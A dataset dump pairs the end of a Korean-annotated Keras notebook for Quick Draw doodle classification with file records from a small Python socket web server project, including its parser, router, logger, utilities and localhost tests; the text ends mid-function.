keras 를 이용해 model 정의하기\n# \n# x, y 의 sequece pattern을 파악하기 위해 conv1을 사용했다.\n# \n\n# > Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(imheight, imwidth, 1))\n# > - 입력 : (32, 32) 채널은 1개\n# > - 중간 : (3, 3)커널 필터개수 32개\n# > - 아웃 : (32, 32) 채널은 32개\n# > - 가중치 개수 : 3x3x32 = 288개\n# > - 참고로 케라스 코드에서는 가장 첫번째 레이어를 제외하고는 입력 형태를 자동으로 계산하므로 이 부분은 신경쓰지 않아도 됩니다.\n# > \n# > model.add(MaxPooling2D(pool_size=(2, 2)))\n# > - pool_size=(수직, 수평) 비율 즉, 크기를 반으로 줄입니다.\n# >\n# >Conv1D\tExtracts local features using 1D filters.\n# >필터를 이용하여 지역적인 특징을 추출합니다.\n\n# In[ ]:\n\n\n\n# model = Sequential()\n# model.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(isequence_length,2)))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n\n# model.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n# model.add(Dropout(0.2))\n\n# model.add(Flatten())\n# model.add(Dense(680, activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(num_classes, activation='softmax'))\n\n# model.summary()\n\n\n# In[ ]:\n\n\ndef createNetwork(seq_len):\n \n # Function to add a convolution layer with batch normalization\n def addConv(network, features, kernel):\n network = BatchNormalization()(network)\n return Conv1D(features, kernel, padding='same', activation='relu')(network)\n \n # Function to add a dense layer with batch normalization and dropout\n def addDense(network, size):\n network = BatchNormalization()(network)\n network = Dropout(0.2)(network)\n return Dense(size, activation='relu')(network)\n \n \n # Input layer\n input = Input(shape=(seq_len, 2))\n network = input\n \n # Add 1D Convolution\n for features in [16, 24, 32]:\n network = addConv(network, features, 5)\n network = MaxPool1D(pool_size=5)(network)\n \n # Add 1D Convolution\n for features in [64, 96, 128]:\n network = addConv(network, features, 5)\n network = MaxPool1D(pool_size=5)(network)\n\n # Add 1D Convolution\n for features in [256, 384, 512]:\n network = addConv(network, features, 5)\n #network = MaxPool1D(pool_size=5)(network)\n\n # Flatten\n network = Flatten()(network)\n \n # Dense layer for combination\n for size in [128, 128]:\n network = addDense(network, size)\n \n # Output layer\n output = Dense(len(files), activation='softmax')(network)\n\n\n # Create and compile model\n model = Model(inputs = input, outputs = output)\n# model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\n\n# # Display model\n# model.summary()\n return model\n\nmodel = createNetwork(sequence_length)\n\n\n# ## 4. 
정의한 모델 사용하기\n# 모델을 정의했으니 모델에 손실함수와 최적화 알고리즘을 적용해보자.\n# \n# model.compile()\n# - 다중 클래스 문제이므로 ‘categorical_crossentropy’으로 지정\n# - 경사 하강법 알고리즘 중 하나인 ‘adam’을 사용\n# - 평가 척도를 나타내며 분류 문제에서는 일반적으로 ‘accuracy’으로 지정\n# \n# 모델을 학습시켜보자\n# \n# model.fit() \n# - 훈련 데이터셋 , batch 사이즈, epoch 수, 검증 데이터셋, 학습 중 출력되는 문구 설정\n\n# In[ ]:\n\n\ndef top_3_accuracy(x,y): \n t3 = top_k_categorical_accuracy(x,y, 3)\n return t3\n\nreduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, \n verbose=1, mode='auto', min_delta=0.005, cooldown=5, min_lr=0)\n\nearlystop = EarlyStopping(monitor='val_loss', mode='auto', patience=2,verbose=0) \n\n#callbacks = [reduceLROnPlat, earlystop]\n#callbacks = earlystop\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy', top_3_accuracy])\n\nmodel.summary()\n\n# model.fit(x=X_train, y=y_train,\n# batch_size = 1000,\n# epochs = 100,\n# validation_data = (X_val, y_val),\n# callbacks = callbacks,\n# verbose = 1)\nmodel.fit(x=X_train, y=y_train,\n batch_size = 1000,\n epochs = 25,\n validation_data = (X_val, y_val),\n verbose = 1)\n\n\n# ## 5. TEST SET 돌리기\n# \n# 잘 돌아가는걸 확인했다.\n# \n# 이제 test set 을 넣어보자.\n# \n# model.predict()\n\n# In[ ]:\n\n\n#%% get test set\nttvlist = []\nreader = pd.read_csv('../input/test_simplified.csv', index_col=['key_id'],\n chunksize=2048)\n\nfor chunk in tqdm(reader, total=55):\n X =[]\n for values in chunk.drawing.values:\n image = json.loads(values)\n strokes = []\n for x_axis, y_axis in image:\n strokes.extend(list(zip(x_axis, y_axis)))\n strokes = np.array(strokes)\n pad = np.zeros((sequence_length, 2))\n if sequence_length>strokes.shape[0]:\n pad[:strokes.shape[0],:] = strokes\n else:\n pad = strokes[:sequence_length, :]\n X.append(pad)\n \n X = np.array(X)\n X = np.reshape(X, (-1,sequence_length, 2))\n testpreds = model.predict(X, verbose=0)\n ttvs = np.argsort(-testpreds)[:, 0:3]\n ttvlist.append(ttvs)\n# imagebag = bag.from_sequence(chunk.drawing.values).map(draw_it)\n# testarray = np.array(imagebag.compute())\n\n# testarray = np.reshape(testarray, (testarray.shape[0], imheight, imwidth, 1))\n# testpreds = model.predict(testarray, verbose=0)\n# ttvs = np.argsort(-testpreds)[:, 0:3] # top 3\n# ttvlist.append(ttvs)\n \nttvarray = np.concatenate(ttvlist)\n\n\n# In[ ]:\n\n\npreds_df = pd.DataFrame({'first': ttvarray[:,0], 'second': ttvarray[:,1], 'third': ttvarray[:,2]})\npreds_df = preds_df.replace(numstonames)\npreds_df['words'] = preds_df['first'] + \" \" + preds_df['second'] + \" \" + preds_df['third']\n\nsub = pd.read_csv('../input/sample_submission.csv', index_col=['key_id'])\nsub['word'] = preds_df.words.values\nsub.to_csv('subcnn_small.csv')\nsub.head()\n\n"
}
] | 3 |
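The notebook text dumped above counts the first Conv2D layer's weights as 3x3x32 = 288; that figure covers kernel weights only, since each of the 32 filters also carries a bias. A minimal stand-alone sketch (assuming TensorFlow 2.x Keras is installed; it is not part of the dumped notebook) that verifies the count:

# Hypothetical check of the parameter-count claim above.
from tensorflow.keras.layers import Conv2D

layer = Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu')
layer.build((None, 32, 32, 1))   # batch dim None; (imheight, imwidth, 1) input
kernel, bias = layer.get_weights()
print(kernel.shape)              # (3, 3, 1, 32) -> 3*3*1*32 = 288 kernel weights
print(bias.shape)                # (32,) biases
print(layer.count_params())      # 320 trainable parameters in total
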
uiandwe/python_web_server
|
https://github.com/uiandwe/python_web_server
|
99145a93ca4ffe14bcb2be725085f6a1ef8e2212
|
e337d08056e3864d34b5613a72d4dfbbfd4b9c33
|
4107931dc4b25cb0e2d789e3f572f57a2787208a
|
refs/heads/develop
| 2023-05-24T18:03:55.649070 | 2020-01-05T12:56:12 | 2020-01-05T12:56:12 | 228,391,870 | 1 | 0 | null | 2019-12-16T13:19:52 | 2022-05-24T00:23:46 | 2023-05-22T22:37:12 |
Python
|
[
{
"alpha_fraction": 0.6403669714927673,
"alphanum_fraction": 0.642201840877533,
"avg_line_length": 29.27777862548828,
"blob_id": "17b5cfb4fb83cdf64db5fc75da07258dd7ac5adf",
"content_id": "16b702314c6689c321292abd9d6af452d54120f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 18,
"path": "/http_handler/urls.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom apis.books import BooksAPI\nfrom apis.homes import HomesAPI\nfrom apis.orders import OrdersApi\nfrom router.router import Router\n\n__all__ = (\n 'router'\n)\n\nmapping_list = [\n (r\"/\", {\"GET\": HomesAPI.do_index, \"POST\": HomesAPI.do_create}),\n (r\"/api/books/\", {\"GET\": BooksAPI.do_index, \"POST\": BooksAPI.do_create}),\n (r\"/api/books/{id:int}/\", {\"GET\": BooksAPI.do_index, \"PUT\": BooksAPI.do_create}),\n (r\"/api/orders/\", {\"GET\": OrdersApi.do_show, \"POST\": OrdersApi.do_update})\n]\n\nrouter = Router(mapping_list)\n"
},
{
"alpha_fraction": 0.5481336116790771,
"alphanum_fraction": 0.5540274977684021,
"avg_line_length": 21.622222900390625,
"blob_id": "5c04b8f82abe2b96bab6b9cc6e7a1393655d968c",
"content_id": "ddcf2b334bff56abe3aefc06097d72f10f870158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1068,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 45,
"path": "/utils/klass/singleton.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# https://wikidocs.net/3693\n\n__all__ = (\n 'Singleton'\n)\n\n\nclass Singleton(type):\n \"\"\"\n 상속용 싱글턴\n \"\"\"\n def __init__(cls, name, bases, dict):\n super(Singleton, cls).__init__(name, bases, dict)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass SingletonInheritance(type):\n \"\"\"\n 상속용 싱글턴 2\n \"\"\"\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(SingletonInheritance, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\ndef singleton_decorator(class_):\n \"\"\"\n 데코레이터용 싱글턴, siaticMethod 접근 불가\n \"\"\"\n instances = {}\n\n def getinstance(*args, **kwargs):\n if class_ not in instances:\n instances[class_] = class_(*args, **kwargs)\n return instances[class_]\n return getinstance\n"
},
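The singleton.py entry above implements the same pattern three ways (metaclass, shared-registry metaclass, decorator). A small usage sketch, with hypothetical Config and Registry classes purely for illustration, showing that repeated instantiation yields one shared object:

from utils.klass.singleton import Singleton, singleton_decorator

class Config(metaclass=Singleton):   # hypothetical example class
    def __init__(self):
        self.values = {}

a, b = Config(), Config()
assert a is b                        # every call returns the one shared instance

@singleton_decorator
class Registry:                      # hypothetical example class
    pass

assert Registry() is Registry()
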
{
"alpha_fraction": 0.6357142925262451,
"alphanum_fraction": 0.6392857432365417,
"avg_line_length": 20.538461685180664,
"blob_id": "41f088d4d7990f4cff1b7c362bab53a2dbe58a04",
"content_id": "eed01887521f2bff0f56653720876407bc0225b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/http_handler/methods.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport inspect\nfrom typing import List\n\n\nclass Methods:\n @classmethod\n def do_options(cls, req: dict) -> List:\n return inspect.getmembers(cls, predicate=inspect.ismethod)\n\n @staticmethod\n def do_head(req: dict) -> str:\n return ''\n"
},
{
"alpha_fraction": 0.5468219518661499,
"alphanum_fraction": 0.554099977016449,
"avg_line_length": 29.761194229125977,
"blob_id": "a9463de3454d51d6180d91c1a0f010a212d42cd8",
"content_id": "0a0e044bf2fce14844f4fa44ec1f8d53790c19cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2061,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 67,
"path": "/http_handler/web_server.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport selectors\nimport socket\nfrom _thread import start_new_thread\n\nfrom logger import Logger\nfrom http_handler.handle import Handle\nfrom utils import args_to_str\n\nLOG = Logger().log\n\n__all__ = (\n 'WebServer'\n)\n\n\nclass WebServer:\n __slots__ = [\"host\", \"port\", \"lsock\", \"sel\"]\n\n def __init__(self, host=\"127.0.0.1\", port=65432):\n self.host = host\n self.port = port\n self.lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sel = selectors.DefaultSelector()\n\n def __call__(self, *args, **kwargs):\n self.lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.lsock.bind((self.host, self.port))\n self.lsock.listen()\n\n LOG.info(args_to_str(\"listen on \", (self.host, self.port)))\n\n self.lsock.setblocking(False)\n self.sel.register(self.lsock, selectors.EVENT_READ, data=None)\n\n try:\n while True:\n events = self.sel.select(timeout=10)\n for key, mask in events:\n if key.data is None:\n self.accept_handler(key.fileobj)\n else:\n handle_obj = key.data\n try:\n handle_obj.process_events(mask)\n except Exception as e:\n LOG.error(e)\n handle_obj.close()\n except KeyboardInterrupt:\n LOG.info(\"close server \")\n finally:\n self.sel.close()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.sel.close()\n\n def accept_handler(self, sock):\n conn, addr = sock.accept()\n LOG.info(args_to_str(\"accepted connection from \", addr))\n conn.setblocking(False)\n\n start_new_thread(self.thread_socket, (conn, addr))\n\n def thread_socket(self, conn, addr):\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n handle_obj = Handle(self.sel, conn, addr)\n self.sel.register(conn, events, data=handle_obj)\n"
},
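web_server.py above accepts connections through a selector loop and hands each socket to a Handle object on its own thread. A rough smoke-test sketch (assuming the server is running on its default 127.0.0.1:65432; not part of the dumped repo):

import socket

# Open a raw TCP connection and issue one request by hand.
with socket.create_connection(("127.0.0.1", 65432), timeout=5) as s:
    s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
    print(s.recv(4096).decode(errors="replace"))
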
{
"alpha_fraction": 0.5562078356742859,
"alphanum_fraction": 0.5647196769714355,
"avg_line_length": 27.872880935668945,
"blob_id": "fec47ef49f2dbcac373261ac7c5f3e9ac35a11c2",
"content_id": "647fc10794da4709b0bc116717405ad58b4d787a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3431,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 118,
"path": "/parser/parser.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nfrom email._policybase import compat32\nfrom email.parser import FeedParser\nfrom io import StringIO\n\nfrom http_handler import HTTPContentType\nfrom logger import Logger\n\nLOG = Logger().log\n\nresponse_content_type = {\n v.name: v.value for v in HTTPContentType.__members__.values()\n}\n\n__all__ = (\n 'ParserHttp'\n)\n\n\nclass ParserImp:\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def parser_request(self, request_line: str) -> dict:\n raise NotImplementedError()\n\n @abstractmethod\n def parser_headers(self, request_headers: str) -> list:\n raise NotImplementedError()\n\n @abstractmethod\n def parser_url_params(self, params_arr: list) -> dict:\n raise NotImplementedError()\n\n\nclass ParserHttp(ParserImp):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n req_line, headers_alone = args[0].split(b'\\r\\n', 1)\n\n req_line = self.parser_request(req_line)\n\n request_headers = self.parser_headers(headers_alone)\n\n return req_line, request_headers\n\n def parser_request(self,\n req_data: bytes) -> dict:\n \"\"\"\n method, url, http protocol, http version, url params, 파서\n ex data) 'GET /static/css/main.css?file_version=1 HTTP/1.1'\n \"\"\"\n\n req_infos = req_data.decode('utf-8').split(' ')\n\n method, urls, protocol, base_version_num, version_num = self.get_req_infos(req_infos)\n\n url_params = []\n origin_url = urls[0]\n\n file_type = origin_url.split(\"/\")[-1]\n content_type = self.find_file_type(file_type)\n\n if len(urls) > 1:\n url_params = self.parser_url_params(urls[1:])\n\n return {\"method\": method,\n \"url\": origin_url,\n \"protocol\": protocol,\n \"version\": version_num,\n \"params\": url_params,\n 'content_type': content_type}\n\n def get_req_infos(self, req_infos: list) -> tuple:\n method = req_infos[0]\n urls = req_infos[1].split('?')\n protocol = req_infos[2]\n base_version_num = protocol.split('/', 1)[1]\n version_num = tuple(base_version_num.split(\".\"))\n\n return method, urls, protocol, base_version_num, version_num\n\n def find_file_type(self, file_type: str) -> str:\n if file_type and file_type.find(\".\") > 0:\n file_type = file_type.split(\".\")[-1]\n return response_content_type[file_type.upper()]\n return response_content_type['HTML']\n\n def parser_url_params(self,\n params_arr: list) -> dict:\n \"\"\"\n url 파라미터 파서\n \"\"\"\n params_dict = {}\n if len(params_arr) > 0:\n for param in params_arr:\n param_split = param.split(\"=\")\n params_dict[param_split[0]] = param_split[1]\n return params_dict\n\n def parser_headers(self,\n request_headers: str) -> list:\n \"\"\"\n 헤더 파서\n \"\"\"\n text = request_headers.decode('ASCII', errors='surrogateescape')\n fp = StringIO(text)\n feed_parser = FeedParser(None, policy=compat32)\n while True:\n data = fp.read(8192)\n if not data:\n break\n feed_parser.feed(data)\n return feed_parser.close()\n"
},
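The parser_request method above splits the request line into method, url, protocol, version, query params, and a content type. A sketch of the expected result for the docstring's own example line, read off the code rather than verified output (the content_type value depends on the HTTPContentType enum, which is not shown in this dump):

parser = ParserHttp()
req = parser.parser_request(b'GET /static/css/main.css?file_version=1 HTTP/1.1')
# Expected, following the code above:
#   req['method']   == 'GET'
#   req['url']      == '/static/css/main.css'
#   req['protocol'] == 'HTTP/1.1'
#   req['version']  == ('1', '1')
#   req['params']   == {'file_version': '1'}
#   req['content_type'] -> the CSS entry of HTTPContentType
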
{
"alpha_fraction": 0.6246851682662964,
"alphanum_fraction": 0.6288833022117615,
"avg_line_length": 24.89130401611328,
"blob_id": "225b08b3953844ca35d6af820f7ea9889140efd7",
"content_id": "15ac7b6764a38489778b5c43ebc0568696648c07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1205,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 46,
"path": "/logger.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nhttps://docs.python.org/3/howto/logging-cookbook.html\nhttps://docs.python.org/ko/3/library/logging.handlers.html\n\"\"\"\n\n# TODO logging.ini 파일로 설정 대체\n\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom utils import create_folder\nfrom utils.klass.singleton import Singleton\n\n__all__ = (\n 'Logger'\n)\n\n\nclass Logger(metaclass=Singleton):\n\n __slots__ = [\"_log\"]\n\n def __init__(self):\n\n create_folder(\"logs\")\n\n self._log = logging.getLogger(\"my\")\n self._log.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(filename)s - %(lineno)s - %(levelname)s - %(message)s')\n\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n\n time_log_handler = TimedRotatingFileHandler(filename='./logs/server.log', when='midnight', interval=1,\n encoding='utf-8')\n time_log_handler.setFormatter(formatter)\n time_log_handler.suffix = \"%Y%m%d\"\n\n self._log.addHandler(time_log_handler)\n self._log.addHandler(stream_handler)\n\n @property\n def log(self):\n return self._log\n"
},
{
"alpha_fraction": 0.6290322542190552,
"alphanum_fraction": 0.6693548560142517,
"avg_line_length": 20.257143020629883,
"blob_id": "b3ae87a8e98b0a381caab883b79b5adb1c1b406c",
"content_id": "f4c79185420f49a06ae968a84cef80eb27c2e5e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 744,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 35,
"path": "/tests/test_api.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport requests\nimport hashlib\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\n\ndef get_text_md5_hash(text):\n\tenc = hashlib.md5()\n\tenc.update(text.encode('utf-8'))\n\tenc_text = enc.hexdigest()\n\treturn enc_text\n\n\ndef test_req_index():\n\n\twith requests.Session() as s:\n\t\treq = s.get('http://localhost:65432/')\n\n\t\tassert req.status_code == 200\n\t\tassert req.headers == {'Accept-Charset': 'utf-8'}\n\n\t\treq = s.head('http://localhost:65432/')\n\n\t\tassert req.status_code == 200\n\t\tassert req.headers == {'Accept-Charset': 'utf-8'}\n\n\ndef test_req_static():\n\twith requests.Session() as s:\n\t\treq = s.get('http://localhost:65432/static/css/main.css')\n\n\t\tassert req.status_code == 200\n"
},
{
"alpha_fraction": 0.5747663378715515,
"alphanum_fraction": 0.577102780342102,
"avg_line_length": 15.461538314819336,
"blob_id": "302062d11ba239718d28c7cb3ba33a79692f86a3",
"content_id": "1eb578e93229c65501ab6476702a6e3e4ba1be9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 26,
"path": "/utils/__init__.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\n__all__ = (\n 'args_to_str',\n 'string_to_byte',\n 'byte_to_string',\n 'create_folder'\n)\n\n\ndef args_to_str(*args) -> str:\n return ''.join(tuple(map(str, args)))\n\n\ndef string_to_byte(s: str) -> bytes:\n return str.encode(s)\n\n\ndef byte_to_string(b: bytes) -> str:\n return str(b)\n\n\ndef create_folder(dir_name: str):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n"
},
{
"alpha_fraction": 0.5525423884391785,
"alphanum_fraction": 0.5559322237968445,
"avg_line_length": 15.38888931274414,
"blob_id": "f941d19b2d3f8e421fffd374cab92bdcb4dfe6a3",
"content_id": "c25c213115d4fae09ac9ff9fa96c66063f3d09f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 18,
"path": "/apis/books.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom http_handler.methods import Methods\n\n__all__ = (\n 'BooksAPI'\n)\n\n\nclass BooksAPI(Methods):\n @staticmethod\n def do_index(req):\n print(\"do_index\")\n return ''\n\n @staticmethod\n def do_create(req):\n print(\"do_create\")\n return ''\n"
},
{
"alpha_fraction": 0.5720164775848389,
"alphanum_fraction": 0.5761317014694214,
"avg_line_length": 14.1875,
"blob_id": "4ba9e7137afb898f036be5722460c0acd4fe1e3a",
"content_id": "aaf4b55c8a41d089fd5f3914f479044802a0911a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 16,
"path": "/apis/orders.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom http_handler.methods import Methods\n\n__all__ = (\n 'OrdersApi'\n)\n\n\nclass OrdersApi(Methods):\n @staticmethod\n def do_show(req):\n return ''\n\n @staticmethod\n def do_update(req):\n return ''\n"
},
{
"alpha_fraction": 0.6352657079696655,
"alphanum_fraction": 0.6376811861991882,
"avg_line_length": 17,
"blob_id": "15acdc828a6157ca649036b4ad118e0e6fa8b136",
"content_id": "d864ac8a8660c03e7df306536422568bb1fa78c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/apis/homes.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom http_handler.methods import Methods\nfrom http_handler.render import RenderHandler\nfrom logger import Logger\n\nLOG = Logger().log\n\n__all__ = (\n 'HomesAPI'\n)\n\n\nclass HomesAPI(Methods):\n\n @staticmethod\n def do_index(req):\n return RenderHandler(HomesAPI.__name__, 'index.html')()\n\n @staticmethod\n def do_create(req):\n print(\"home do_create\")\n return ''\n"
},
{
"alpha_fraction": 0.6562731862068176,
"alphanum_fraction": 0.6644394993782043,
"avg_line_length": 34.44736862182617,
"blob_id": "08bcff20fcd6187df8c972e330be90f85a525594",
"content_id": "1562a488b98a629a5d7926718adf164bcee3955b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1377,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 38,
"path": "/tests/test_router.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport types\n\n# TODO 해당 구문 쉽게 쓸수 있는지 확인하기\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nfrom apis.books import BooksAPI\nfrom apis.homes import HomesAPI\nfrom apis.orders import OrdersApi\nfrom router.router import Router\n\n\nmapping_list = [\n\t# path, {method: func,}\n\t(r\"/\", {\"GET\": HomesAPI.do_index, \"POST\": HomesAPI.do_create}),\n\t(r\"/api/books/\", {\"GET\": BooksAPI.do_index, \"POST\": BooksAPI.do_create}),\n\t(r\"/api/books/{id:int}/\", {\"GET\": BooksAPI.do_index, \"PUT\": BooksAPI.do_create}),\n\t(r\"/api/orders/\", {\"GET\": OrdersApi.do_show, \"POST\": OrdersApi.do_update})\n]\n\nrouter = Router(mapping_list)\nrouter2 = Router(mapping_list)\n\n\ndef test_router_singleton():\n\tassert id(router) == id(router2)\n\n\ndef test_router_lookup():\n\tassert router.lookup(\"GET\", \"/\") == (HomesAPI.do_index, [])\n\tassert router.lookup(\"GET\", \"/api/books/\") == (BooksAPI.do_index, [])\n\tassert router.lookup(\"POST\", \"/api/books/\") == (BooksAPI.do_create, [])\n\tassert router.lookup(\"GET\", \"/api/orders/\") == (OrdersApi.do_show, [])\n\tassert router.lookup(\"POST\", \"/api/orders/\") == (OrdersApi.do_update, [])\n\tassert router.lookup(\"GET\", \"/api/books/123/\") == (BooksAPI.do_index, [types.SimpleNamespace(name='id', type='int', data='123')])\n\tassert router.lookup(\"GET\", \"/api/books/23/test/\") == (None, None)\n"
},
{
"alpha_fraction": 0.577363908290863,
"alphanum_fraction": 0.5802292227745056,
"avg_line_length": 14.48888874053955,
"blob_id": "28d09e996b42aeb48a0f29c1c083d2d947e4deba",
"content_id": "159492c7d745a62319c32cef2f19a40d6d761b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 45,
"path": "/README.md",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# python_web_server\n\n파이썬 웹 서버 \n- 1단계 : 서버 기초 기능 구현\n- 2단계 : 디비 및 상호작용 구현 -> 프레임워크로 변경 예정 \n\n\n\n### 구조\n- apis/ : 비지니스 로직 및 해당 메소드 구현 클래스 모음\n- http : http 통신 관련 클래스 및 선언 모음\n- logs/ : 로그 파일 저장 디렉토리(날짜별로 저장) \n- tests/ : 유닛 및 전체 테스트 클래스 모음 \n- parser/ : 통신 객체의 파서 클래스 \n- router/ : 통신 요청 url 객체 클래스\n- static/ : 이미지/css 등의 static 폴더 \n- template : html 템플릿 폴더 \n- handle :\n- logger :\n- main :\n- singleton : singleton 구현 클래스 \n- urls : \n- urtils : \n- web_server : \n\n\n### 로그 규칙\n- debug : 예정....\n- info : 정보확인용\n- error : exception의 에러 확인용\n\n\n\n### 사용 단어집\n\n- 숫자 : int\n- 문자열 : str\n- 바이트 : byte\n- 바이트문자열 : bytes\n- 파라미터 : param\n- 파라미터들 : params\n- 요청 : request / req\n- 응답 : response / res\n- 접두사 : prefix\n- 정규표현식 : regx \n"
},
{
"alpha_fraction": 0.5137494802474976,
"alphanum_fraction": 0.5163683891296387,
"avg_line_length": 22.86458396911621,
"blob_id": "eaa88c9305841a11beff30810c0944116639aa63",
"content_id": "03d60c1116309b7e10eae29a531c73cbb1d6b2ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2299,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 96,
"path": "/utils/decorator/memoization.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom functools import wraps, partial\nfrom collections import Hashable\n\n\n__all__ = (\n \"LRU\",\n \"Memoized\",\n \"memoize\"\n)\n\n# TODO cache_size 에러 체크\n\n\nclass LRU:\n \"\"\"Decorator\n Least Recently Used (LRU)\n \"\"\"\n __slots__ = [\"func\", \"cache_list\", \"cache_dict\", \"cache_size\"]\n\n def __init__(self, cache_size=128):\n self.cache_dict = {}\n self.cache_list = []\n self.cache_size = cache_size\n\n def __call__(self, func):\n def wrapper(*args, **kwargs):\n if not isinstance(args, Hashable):\n return func(*args)\n\n key = str(args) + str(kwargs)\n\n if key in self.cache_list:\n self.cache_list.remove(key)\n self.cache_list.append(key)\n elif self.cache_size > 0:\n if len(self.cache_list) == self.cache_size:\n del self.cache_list[0]\n del self.cache_dict[key]\n self.cache_list.append(key)\n self.cache_dict[key] = func(*args, **kwargs)\n else:\n self.cache_list.append(key)\n self.cache_dict[key] = func(*args, **kwargs)\n\n return self.cache_dict[key]\n\n return wrapper\n\n def __repr__(self):\n return self.func.__doc__\n\n def __get__(self, instance, owner):\n return partial(self.__call__, instance)\n\n\nclass Memoized:\n \"\"\"Decorator.\n Caches a function's return value.\n \"\"\"\n\n __slots__ = [\"func\", \"cache\"]\n\n def __init__(self, func):\n self.func = func\n self.cache = {}\n\n def __call__(self, *args, **kwargs):\n if not isinstance(args, Hashable):\n return self.func(*args)\n\n if args in self.cache:\n return self.cache[args]\n else:\n value = self.func(*args)\n self.cache[args] = value\n return value\n\n def __repr__(self):\n return self.func.__doc__\n\n def __get__(self, instance, owner):\n return partial(self.__call__, instance)\n\n\ndef memoize(func):\n cache = {}\n\n @wraps(func)\n def momoizer(*args, **kwargs):\n key = str(args) + 